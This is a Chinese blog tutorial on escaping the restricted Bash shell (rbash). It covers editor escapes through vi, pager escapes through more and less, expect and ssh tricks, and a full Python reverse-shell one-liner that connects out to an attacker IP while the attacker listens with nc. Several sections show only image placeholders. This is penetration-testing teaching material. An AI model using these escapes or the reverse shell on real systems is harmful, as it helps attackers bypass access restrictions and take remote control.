RBash - 受限的Bash绕过

RBash - 受限的Bash绕过

man bash的时候,里面会有介绍到关于rbash是个什么东西

翻译解释一下就是

如果bash以rbash这个名字启动,或者是通过-r选项调用时,那么这个shell就会受限

受限shell(以下统称为rbash)和bash相同,但以下情况是不允许rbash执行的

  1. 使用命令cd更改目录
  2. 设置或者取消环境变量的设置(SHELL, PATH, ENV, or BASH_ENV)
  3. 指定包含参数’/‘的文件名
  4. 指定包含参数’ - ‘的文件名
  5. 使用重定向输出’>’, ‘>>’, ‘> |’, ‘<>’ ‘>&’,’&>’

大致的限制如上

那么我们如果在实际环境中,如果想要对环境进行进一步的操作,那么rbash肯定是不符合要求的,所以才有了“绕过”这一行为

而因为rbash的特殊性问题,绕过的方法,大多都是通过Linux机器上现有的软件,来执行一个没有限制的shell回来使用

创建限制shell的用户

在RHEL和Centos的系统中,rbash不能直接实现,所以在开始之前,我们需要通过ln -s来建立一个软连接

然后创建用户的时候,在设置用户是以/bin/rbash来启动的shell

试试水,发现用户elapse不能切换目录了,至于为什么这样能生效,在上面解释了rbash和bash是同个东西,只不过不同命名启动时,效果不一样

RBash 绕过

hacking articles中,有解释过类似的行为

他将绕过rbash的操作分为了6个部分

第一个是使用Linux现有的软件,例如vi或者ed这类编辑器,来执行一个shell

第二个是使用一种语言来执行命令,返回一个无限制的shell,例如使用python的os库执行/bin/bash

第三个是使用系统命令或者php之类的,反弹一个系统shell到你的攻击机上

第四个是利用系统中的二进制文件来进行绕过,这里给出的文件有more less man

第五个是,利用expect来绕过

第六个是,通过ssh来绕过rbash的限制

编辑器绕过rbash

  • vi编辑器

在命令行中,输入vi,在末行模式中,输入:set shell=/bin/bash

这里就直接将shell设置为/bin/bash

接着在执行命令shell就好了

然后就有一个无限制的shell了

  • ed编辑器

使用编程语言绕过rbash

  • python

  • perl

反弹shell来绕过rbash

  • python反弹

首先在攻击机中nc -lvp开启监听端口,然后靶机中输入

![12](C:\Users\elap_\Desktop\img\12.png)python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  • php反弹

利用二进制文件

  • more
直接 ! 'sh'
  • less

16

然后末行模式输入! 'sh'

  • man

和上面一样

Expect 绕过rbash

expect是免费的编程工具,用来实现自动的交互式任务,在实际环境中脚本或者命令都需要从终端输入来继续运行,而expect就可以根据程序的提示来模拟输入个程序

ssh绕过rbash

好像不止有这种写法,但是版本问题只能用这个

还有-t "/binbash"

文章目录
  1. 1. RBash - 受限的Bash绕过
    1. 1.1. 创建限制shell的用户
    2. 1.2. RBash 绕过
      1. 1.2.1. 编辑器绕过rbash
      2. 1.2.2. 使用编程语言绕过rbash
      3. 1.2.3. 反弹shell来绕过rbash
      4. 1.2.4. 利用二进制文件
      5. 1.2.5. Expect 绕过rbash
      6. 1.2.6. ssh绕过rbash
,